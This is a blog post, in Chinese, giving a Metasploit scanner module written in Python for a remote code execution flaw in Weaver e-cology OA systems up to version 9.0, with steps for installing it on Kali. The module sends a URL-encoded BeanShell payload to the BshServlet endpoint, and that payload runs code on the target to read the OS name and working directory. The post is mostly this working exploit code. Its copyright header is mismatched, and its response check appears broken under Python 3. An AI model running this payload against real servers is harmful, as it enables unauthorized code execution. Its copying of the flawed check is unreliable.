05-msf的泛微OA-rce扫描模块

发表于 | 分类于 | 阅读数

写一个泛微OA的scanner扫描模块

这是python3的模块,使用方法是放到kali对应目录下:/usr/share/metasploit-framework/modules/auxiliary/scanner/http/weaver_e_cology_rce_scanner.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
#!/usr/bin/env python
# Copyright (c) 2003-2018 CORE Security Technologies
#
# This software is provided under under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#

import requests
import metasploit.module as module

metadata = {
    'name': 'weaver e-cology oa system rce',
    'description': '''weaver e-cology oa system <=9.0 remote code execution''',
    'authors': ['whale3070'],
    'date': '2021-02-19',
    'license': 'CORE_LICENSE',
    'references': [
        {'type': 'url', 'ref': 'https://whale3070.github.io/'},
     ],
    'type': 'single_scanner',
    'options': {
        'RPORT': {'type': 'string', 'description': 'PORT', 'required': True}
    },
    'notes': {
        'AKA': ['weaver_e_cology_rce_scanner.py']
    }
}

def log(message, level='info'):
    print(
        r'''
                {
                    "jsonrpc": "2.0", "method": "message", "params":
                    {
                        "level": "%s",
                        "message": "%s"
                    }
                }
        ''' % (level, message)
    )

def single_url(rhost, rport):
    request_url = 'http://' + rhost + ":" + rport + "/weaver/bsh.servlet.BshServlet"
    vuln_url = request_url
    headers = {
        'User-Agent': "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:55.0) Gecko/20100101 Firefox/55.0",
        'Content-Type': "application/x-www-form-urlencoded",
        'Content-Length': "43",
        'Referer': "%s" % vuln_url,
        'Connection': "close"
    }
    payload = r'''bsh.script=print(Interpreter.VERSION);%53%74%72%69%6e%67%20%4f%53%20%3d%20%53%79%73%74%65%6d%2e%67%65%74%50%72%6f%70%65%72%74%69%65%73%28%29%2e%67%65%74%50%72%6f%70%65%72%74%79%28%22%6f%73%2e%6e%61%6d%65%22%29%3b%0d%0a%70%72%69%6e%74%28%4f%53%29%3bpwd()'''
    try:
        r = requests.post(url=vuln_url, data=payload, headers=headers, timeout=5)
        if r.status_code == 200 and r'getProperty' in r.content:
            log("Found weaver e-cology RCE in " + vuln_url, 'good')
        else:
            log("Not found weaver e-cology RCE in " + vuln_url, 'warning')
    except requests.exceptions.RequestException as e:
        log("Not found weaver e-cology RCE in " + vuln_url, 'warning')

def run(args):
    # formatted_args = {}
    # for key, value in args.items():
    #     formatted_args[str.upper(key)] = value
    # log(str(formatted_args), 'good')
    rhost = args['rhost']
    rport = args['RPORT']
    single_url(rhost, rport)

if __name__ == "__main__":
    module.run(metadata, run)